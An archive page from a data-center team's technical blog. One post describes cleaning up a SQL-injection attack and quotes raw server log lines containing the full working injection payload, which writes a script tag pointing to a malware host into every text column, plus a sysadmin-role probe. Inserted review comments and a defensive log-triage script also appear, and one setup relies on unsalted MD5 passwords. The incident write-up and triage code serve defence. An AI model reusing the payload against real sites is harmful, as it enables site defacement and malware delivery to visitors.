Archive for the ‘westdc’ Category

GeoNetwork problems in an IPv6 environment

Posted on May 15th, 2009 in Computer, westdc | No Comments »

Under IPv6, GeoNetwork runs into some odd problems: searching fails, new metadata cannot be added, and thumbnails cannot be uploaded. Disabling IPv6 on the client makes these problems go away, but that is not a real fix.

So the temporary workaround is to stop GeoNetwork from evaluating the client IP address at all (it uses it to decide whether the request comes from the intranet, a feature that is meaningless for us).
wlx@wlxpc:~/Projects/geonetwork-2.2.0/src/org/fao/geonet/kernel$ svn diff
Index: AccessManager.java
===================================================================
--- AccessManager.java (版本 3883)
+++ AccessManager.java (工作副本)
@@ -322,11 +322,13 @@
String network = settMan.getValue("system/intranet/network");
String netmask = settMan.getValue("system/intranet/netmask");

- long lIntranetNet = getAddress(network);
- long lIntranetMask = getAddress(netmask);
- long lAddress = getAddress(ip);
+ // to avoid ipv6 problem
+ //long lIntranetNet = getAddress(network);
+ //long lIntranetMask = getAddress(netmask);
+ //long lAddress = getAddress(ip);

- return (lAddress & lIntranetMask) == lIntranetNet ;
+ //return (lAddress & lIntranetMask) == lIntranetNet ;
+ return false;
}

//--------------------------------------------------------------------------
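Review bot: `return false;` turns the intranet check into a hard-coded bypass: every caller of this method now treats every client as external, and the commented-out `long lIntranetNet ... lAddress` lines plus the `// to avoid ipv6 problem` note leave dead code in place instead of recording the reason. If the intranet feature is genuinely unused here, a setting that disables it would be clearer than editing the kernel class; if the real defect is that `getAddress()` only understands dotted IPv4 and fails on an IPv6 literal, the narrower fix is to detect a non-IPv4 `ip` (for example, a `:` in the string) and return false only in that branch, keeping the `(lAddress & lIntranetMask) == lIntranetNet` test for IPv4 clients.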

I have also reported the problem upstream to the GeoNetwork project, to see how they want to solve it.

Data center website hit by SQL injection

Posted on May 30th, 2008 in tech, westdc | No Comments »

Last night Mr. Li called to say that access to the West Data Center site was misbehaving.
On close inspection the site turned out to have been SQL-injected: every string column in SQL Server had a tail appended that pointed to a malware site.
A further check showed that the last full database backup dated from before the New Year, and many new users had registered since then, so the only option was to clean up by hand.
The main tool for this was SQL Server's replace function:

update table set f1=replace(f1,'xxx','')

I cleaned the affected columns in every table by hand, which is pure drudgery. Along the way I also found that the membership table contained 4 duplicate user names; that error took 3-4 hours to track down. Ugh.
The log records show how the injection was done:

6985 210.77.68.241 GET /dataservices/fullmetadata.aspx id={616cf641-13dc-4f2a-ae40-6a4d8f42ddc6};dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536362537352536332536422537352537352532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.246.32.206 Mozilla/4.0 302 0 0
2008-05-27 00:08:02 W3SVC1565836985 210.77.68.241 GET /dataservices/fullmetadata.aspx id={616cf641-13dc-4f2a-ae40-6a4d8f42ddc6}';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536362537352536332536422537352537352532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.246.32.206 Mozilla/4.0 302 0 0
2008-05-27 00:08:03 W3SVC1565836985 210.77.68.241 GET /dataservices/fullmetadata.aspx id={7ce7f0d6-7b5c-4136-82cb-eca3a2083902};dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536362537352536332536422537352537352532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.246.32.206 Mozilla/4.0 302 0 0
2008-05-27 00:08:03 W3SVC1565836985 210.77.68.241 GET /dataservices/fullmetadata.aspx id={7ce7f0d6-7b5c-4136-82cb-eca3a2083902}';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536362537352536332536422537352537352532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.246.32.206 Mozilla/4.0 302 0 0
2008-05-27 00:08:03 W3SVC1565836985 210.77.68.241 GET /dataservices/fullmetadata.aspx id={616cf641-13dc-4f2a-ae40-6a4d8f42ddc6}%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1 80 - 218.246.32.206 Mozilla/4.0 302 0 0
2008-05-27 00:08:03 W3SVC1565836985 210.77.68.241 GET /dataservices/fullmetadata.aspx id={7ce7f0d6-7b5c-4136-82cb-eca3a2083902}%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1 80 - 218.246.32.206 Mozilla/4.0 302 0 0
2008-05-27 00:08:03 W3SVC1565836985 210.77.68.241 GET /useterms.aspx id=1;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536362537352536332536422537352537352532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.246.32.206 Mozilla/4.0 200 0 64
2008-05-27 00:08:04 W3SVC1565836985 210.77.68.241 GET /useterms.aspx id=1';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536362537352536332536422537352537352532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.246.32.206 Mozilla/4.0 200 0 64
2008-05-27 00:08:04 W3SVC1565836985 210.77.68.241 GET /useterms.aspx id=1%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1 80 - 218.246.32.206 Mozilla/4.0 200 0 0

So the attacker operated from the machine 218.246.32.206; searching for that IP address turns up many results, so this was presumably an automated tool attack.
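As an added example (not code from the original post), a small Python triage helper for IIS W3C log lines of the kind quoted above: it URL-decodes and lower-cases the query so the mIxEd-cAsE keywords no longer hide, flags the markers of this injection, and decodes the 0x hex literals so an analyst can see which string was appended to every column and that the IS_SRVROLEMEMBER probe asks whether the application's database login is sysadmin. The field layout (date time site s-ip method uri-stem uri-query port user c-ip user-agent status substatus win32) is assumed from the quoted log, and the sample lines use a placeholder host and addresses.

```python
import re
from urllib.parse import unquote

# Markers of the mass-injection seen in the quoted log, matched against the
# URL-decoded, lower-cased query (which neutralises the mixed-case keyword evasion).
MARKERS = {
    "cursor_over_catalog": re.compile(r"\bdeclare\b.*\bcursor\b.*\bsys(objects|columns)\b"),
    "dynamic_exec": re.compile(r"\bexec\s*\("),
    "hex_cast": re.compile(r"\bcast\s*\(\s*0x[0-9a-f]+\s+as\s+varchar"),
    "sysadmin_probe": re.compile(r"\bis_srvrolemember\s*\("),
    "comment_terminator": re.compile(r"--\s*$"),
}
HEX_LITERAL = re.compile(r"0x([0-9a-f]{2,})", re.I)

def parse_line(line):
    """Pick the needed fields out of one W3C log line (assumed layout, see lead-in)."""
    f = line.split()
    return {"stem": f[5], "query": f[6], "client_ip": f[9], "status": f[11]}

def decode_hex(h):
    """Turn a 0x literal into text; every second byte 0x00 means UTF-16LE (an N'...' string)."""
    try:
        raw = bytes.fromhex(h)
    except ValueError:
        return h
    if len(raw) % 2 == 0 and raw[1::2] == b"\x00" * (len(raw) // 2):
        return raw.decode("utf-16-le")
    return unquote(raw.decode("latin-1"))  # the src= inside the injected tag is percent-encoded too

def triage(line):
    """Return (client ip, uri stem, sorted marker names hit, decoded hex payloads)."""
    rec = parse_line(line)
    q = unquote(rec["query"]).lower()
    hits = sorted(name for name, rx in MARKERS.items() if rx.search(q))
    payloads = [decode_hex(h) for h in HEX_LITERAL.findall(rec["query"])]
    return rec["client_ip"], rec["stem"], hits, payloads

# Constructed sample lines mirroring the shape of the quoted log (placeholder host and IPs).
INJECTED = '"></title><script src=http://example.invalid/x.js></script><!--'
SAMPLE_INJECT = (
    "2008-05-27 00:08:03 W3SVC1 10.0.0.1 GET /useterms.aspx "
    "id=1;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR"
    "%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD"
    "%20oPeN%20tAbLe_cursoR%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']="
    "['%2b@c%2b']%2bcAsT(0x" + INJECTED.encode().hex().upper() + "%20aS%20vArChAr(63))')%20eNd;-- "
    "80 - 192.0.2.10 Mozilla/4.0 200 0 64")
SAMPLE_PROBE = (
    "2008-05-27 00:08:04 W3SVC1 10.0.0.1 GET /useterms.aspx "
    "id=1%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))"
    "%2Bchar(124)=1 80 - 192.0.2.10 Mozilla/4.0 200 0 0")
```

The decoded probe value shows why the application login must not be sysadmin: the tool checks that role before deciding how far to go.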

There is also an automatic recovery method on CSDN, which is far less work than my manual recovery.

Note that this attack specifically targets SQL Server.

Calling the westdc search function

Posted on December 26th, 2007 in westdc | 1 Comment »

How do you call the westdc search function?
The WESTDC search URL is: http://westdc.westgis.ac.cn/DataServices/SearchMetadata.aspx
Parameters can be passed with either GET or POST.
The parameters are:
q, full-text search keyword
e, longitude (east)
w, longitude (west)
s, latitude (south)
n, latitude (north)

For example, with GET you can call it directly:

http://westdc.westgis.ac.cn/DataServices/SearchMetadata.aspx?q=沙漠&e=100&w=50&s=50&n=70

It can also be called with POST; the code is as follows:

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
</head>
<body>
<form action="http://westdc.westgis.ac.cn/DataServices/SearchMetadata.aspx" method="post" name="form1">
<input type="text" name="q" />
<input type="submit" value="submit" />
</form>
</body>
</html>

The result looks like this:

Integrating phpbb3 with the SVN service

Posted on September 2nd, 2007 in Linux, phpbb, westdc | 1 Comment »

"Integration" is a somewhat grand title, heh.
All it really means is handing SVN user control over to phpbb3.
This requires that SVN access be controlled through apache2/mod_auth_mysql.
Then create a new user group in the phpbb3 admin panel to control which users may access the SVN service, and create a view in MySQL that extracts the user names and passwords. Note that phpbb3 stores passwords as plain MD5. Assuming the group is named svn:

create view svnauth (username, passwd, groups) as
  select users.username, users.user_password, groups.group_name
  from groups, user_group
    left join users on user_group.user_id = users.user_id
  where groups.group_name = "svn"
    and user_group.group_id = groups.group_id;

Then set the following in the apache2 site file:

Auth_MySQL_Encryption_Types PHP_MD5

That is all; for the concrete steps see the earlier post: Installing subversion: ssl+auth_mysql+mod_svn

This probably needs MySQL 5; I am not sure whether MySQL 4 supports views.

RSS aggregator

Posted on March 22nd, 2007 in westdc | 1 Comment »

The data center's blog system uses an RSS aggregator, so that individuals can keep their own independent blogs.
The most widely used one is planetplanet, but it is written in Python and nobody on the team knows Python yet, so we chose moonmoon instead. It is a bit rough and only at version 0.2beta, but it is functionally complete and written in PHP.

tong's blog is on MSN Spaces, which does not yet support per-category feeds, so the only option is to customise the code.
Edit app/classes/Planet.class.php and add one line around line 286:

if (strpos($person->website,"spaces.live.com")===false || $item->get_category()=="westdc")

This way, for MSN Spaces blogs specifically, only posts from a fixed category are pulled in; here I pull the westdc category.
The remaining work is customising the interface so that it matches the rest of the system.